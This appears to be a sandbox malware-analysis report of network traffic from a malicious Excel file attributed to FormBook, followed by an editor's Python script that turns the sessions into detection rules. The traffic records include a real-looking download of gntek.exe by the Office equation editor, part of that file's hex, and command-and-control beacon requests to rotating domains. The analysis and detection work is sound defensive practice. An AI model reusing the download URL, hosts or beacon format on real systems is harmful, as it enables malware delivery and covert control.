Jan 28, 2022 22:37:20.948700905 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.948714018 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.948725939 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.948741913 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.948746920 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.948753119 CET  80           49165      212.192.246.120  192.168.2.22
Jan 28, 2022 22:37:20.948762894 CET  49165        80         192.168.2.22     212.192.246.120
Jan 28, 2022 22:37:20.948781013 CET  80           49165      212.192.246.120  192.168.2.22
                                                      Jan 28, 2022 22:37:20.948793888 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948806047 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948828936 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948832035 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948843002 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948858976 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948860884 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948884010 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948894978 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948909044 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948909998 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948935986 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948945045 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948962927 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948971987 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.948988914 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.948997021 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949012995 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949022055 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949037075 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949048042 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949063063 CET8049165212.192.246.120192.168.2.22
                                                      Jan 28, 2022 22:37:20.949074030 CET4916580192.168.2.22212.192.246.120
                                                      Jan 28, 2022 22:37:20.949085951 CET8049165212.192.246.120192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 22:38:37.858086109 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:38:38.171220064 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 22:38:43.840178013 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:38:43.863972902 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 22:38:48.928319931 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:38:48.960673094 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 22:38:54.068027020 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:38:54.113177061 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 22:38:59.240909100 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:38:59.272581100 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Jan 28, 2022 22:39:04.275386095 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 22:39:04.464575052 CET | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 22:38:37.858086109 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.927291.com | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:43.840178013 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.teentykarm.quest | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:48.928319931 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.zoharfine.com | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:54.068027020 CET | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.mollyagee.com | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:59.240909100 CET | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.youngliving1.com | A (IP address) | IN (0x0001)
Jan 28, 2022 22:39:04.275386095 CET | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.frentags.art | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 22:38:38.171220064 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.927291.com | | 1.32.255.137 | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:43.863972902 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.teentykarm.quest | | 37.123.118.150 | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:48.960673094 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.zoharfine.com | zoharfine.com | | CNAME (Canonical name) | IN (0x0001)
Jan 28, 2022 22:38:48.960673094 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | zoharfine.com | | 194.5.156.29 | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:54.113177061 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.mollyagee.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001)
Jan 28, 2022 22:38:54.113177061 CET | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | ghs.googlehosted.com | | 172.217.168.19 | A (IP address) | IN (0x0001)
Jan 28, 2022 22:38:59.272581100 CET | 8.8.8.8 | 192.168.2.22 | 0x9037 | Name error (3) | www.youngliving1.com | none | none | A (IP address) | IN (0x0001)
Jan 28, 2022 22:39:04.464575052 CET | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.frentags.art | | 44.227.76.166 | A (IP address) | IN (0x0001)
                                                      • 212.192.246.120
                                                      • www.927291.com
                                                      • www.teentykarm.quest
                                                      • www.zoharfine.com
                                                      • www.mollyagee.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 212.192.246.120 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 22:37:20.867891073 CET | 0 | OUT | GET /gntek.exe HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 212.192.246.120
                                                      Connection: Keep-Alive
Jan 28, 2022 22:37:20.896116972 CET | 1 | IN | HTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Fri, 28 Jan 2022 06:21:53 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "b7739b57f14d81:0"
                                                      Server: Microsoft-IIS/10.0
                                                      Date: Fri, 28 Jan 2022 21:37:20 GMT
                                                      Content-Length: 254186
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 3e 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 b0 3e 42 00 8d 45 a4 57 50 ff 75 08 ff
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@U\}t+}FEuH>BHPuuuHr@BSV5>BEWPu


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 1.32.255.137 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 22:38:38.511356115 CET | 271 | OUT | GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.927291.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Jan 28, 2022 22:38:38.840186119 CET | 271 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 28 Jan 2022 21:38:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 37.123.118.150 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 22:38:43.893686056 CET | 272 | OUT | GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.teentykarm.quest
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Jan 28, 2022 22:38:43.922127962 CET | 272 | IN | HTTP/1.1 403 Forbidden
                                                      Server: nginx/1.10.3 (Ubuntu)
                                                      Date: Fri, 28 Jan 2022 21:38:43 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 178
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49169 | 194.5.156.29 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 22:38:48.985671997 CET | 273 | OUT | GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.zoharfine.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Jan 28, 2022 22:38:49.024722099 CET | 274 | IN | HTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Fri, 28 Jan 2022 21:38:49 GMT
                                                      server: LiteSpeed
                                                      location: https://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 
6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.22 | 49170 | 172.217.168.19 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 22:38:54.132006884 CET | 275 | OUT | GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1
                                                      Host: www.mollyagee.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Jan 28, 2022 22:38:54.234707117 CET | 276 | IN | HTTP/1.1 301 Moved Permanently
                                                      Location: https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89
                                                      Date: Fri, 28 Jan 2022 21:38:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Server: ghs
                                                      Content-Length: 331
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 6f 6c 6c 79 61 67 65 65 2e 72 65 6d 61 78 2e 63 6f 6d 2f 62 38 30 69 2f 3f 53 5a 35 54 75 4c 3d 58 6b 42 6f 69 53 7a 63 48 6c 73 6d 71 46 6b 59 4d 47 4b 79 78 68 4b 45 35 52 30 75 63 4e 44 6c 48 57 77 31 6d 72 54 41 46 35 61 47 4d 76 6c 78 41 67 31 2f 6f 33 48 2b 2f 49 39 6e 33 58 7a 74 30 4a 73 6d 54 41 3d 3d 26 61 6d 70 3b 62 5a 33 30 78 78 3d 30 6c 4c 4c 41 50 41 38 39 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&amp;bZ30xx=0lLLAPA89">here</A>.</BODY></HTML>
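The sessions above show two behaviours worth turning into detection logic: EQNEDT32.EXE fetching an MZ file over plain HTTP (session 0), and the injected explorer.exe sending the same-shaped GET to a different Host every few seconds right after a burst of A-record lookups (sessions 1 to 4 and the DNS query table). The script below is an added example by the editor, not code from Joe Sandbox or from the FormBook sample; its records are constructed from the tables above (response bodies truncated to their first bytes, one benign request added for contrast), and the regex widths, the process allow-list and the thresholds are the editor's assumptions, generalising from the four beacons shown.

```python
"""Added example, not code from the Joe Sandbox report: detection logic run
over the HTTP sessions and DNS queries recorded above for W6902.xlsx.
Records are constructed from the report's own tables (bodies truncated);
the beacon regex, process list and thresholds are the editor's assumptions."""
import re
from dataclasses import dataclass
from datetime import datetime


@dataclass
class HttpSession:
    process: str        # image path of the process that owned the socket
    host: str           # value of the Host header
    request_line: str   # first line of the request
    status: int         # response status code
    body_prefix: bytes  # first bytes of the response body


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed from sessions 0-4 above, plus one hypothetical benign request.
SESSIONS = [
    HttpSession(EQNEDT, "212.192.246.120", "GET /gntek.exe HTTP/1.1", 200, b"MZ\x90\x00\x03\x00"),
    HttpSession(EXPLORER, "www.927291.com",
                "GET /b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 HTTP/1.1",
                404, b"<html>"),
    HttpSession(EXPLORER, "www.teentykarm.quest",
                "GET /b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 HTTP/1.1",
                403, b"<html>"),
    HttpSession(EXPLORER, "www.zoharfine.com",
                "GET /b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 HTTP/1.1",
                301, b"<!DOCTYPE html>"),
    HttpSession(EXPLORER, "www.mollyagee.com",
                "GET /b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 HTTP/1.1",
                301, b"<HTML>"),
    # hypothetical benign browser request, not from the report
    HttpSession(r"C:\Program Files\Internet Explorer\iexplore.exe", "www.example.com",
                "GET /index.html HTTP/1.1", 200, b"<!DOCTYPE html>"),
]

# Constructed from the DNS query table above: (client IP, time of day, name).
DNS_QUERIES = [
    ("192.168.2.22", "22:38:37.858086", "www.927291.com"),
    ("192.168.2.22", "22:38:43.840178", "www.teentykarm.quest"),
    ("192.168.2.22", "22:38:48.928320", "www.zoharfine.com"),
    ("192.168.2.22", "22:38:54.068027", "www.mollyagee.com"),
    ("192.168.2.22", "22:38:59.240909", "www.youngliving1.com"),
    ("192.168.2.22", "22:39:04.275386", "www.frentags.art"),
]

# Office helpers that have no business downloading executables (assumption).
OFFICE_HELPERS = {"eqnedt32.exe", "excel.exe", "winword.exe", "powerpnt.exe"}

# Shape of the beacons above: /<short dir>/?<param>=<base64>&<param>=<token>.
# The character-class widths generalise from the four requests in the report.
BEACON_RE = re.compile(
    r"^GET /([a-z0-9]{3,5})/\?([A-Za-z0-9]{4,8})=([A-Za-z0-9+/]{20,}={0,2})"
    r"&([A-Za-z0-9]{4,8})=([A-Za-z0-9]{6,12}) HTTP/1\.[01]$")


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_executable_downloads(sessions):
    """Sessions in which an Office helper received a PE image (MZ magic)."""
    return [s for s in sessions
            if image_name(s.process) in OFFICE_HELPERS
            and s.status == 200 and s.body_prefix.startswith(b"MZ")]


def beacon_clusters(sessions, min_hosts=3):
    """Group beacon-shaped requests by (process, path, param names, token).
    Same key but a different Host each time is the rotation shown above."""
    groups = {}
    for s in sessions:
        m = BEACON_RE.match(s.request_line)
        if m:
            key = (image_name(s.process), m.group(1), m.group(2), m.group(4), m.group(5))
            groups.setdefault(key, set()).add(s.host)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_hosts}


def dns_bursts(queries, window_s=60.0, min_names=4):
    """Clients that resolve >= min_names distinct names within window_s seconds."""
    by_client = {}
    for client, ts, name in queries:
        t = datetime.strptime(ts, "%H:%M:%S.%f")
        by_client.setdefault(client, []).append((t, name))
    hits = {}
    for client, events in by_client.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            names = {n for t, n in events[i:] if (t - t0).total_seconds() <= window_s}
            if len(names) >= min_names:
                hits[client] = sorted(names)
                break
    return hits


if __name__ == "__main__":
    print(office_executable_downloads(SESSIONS))
    print(beacon_clusters(SESSIONS))
    print(dns_bursts(DNS_QUERIES))
```

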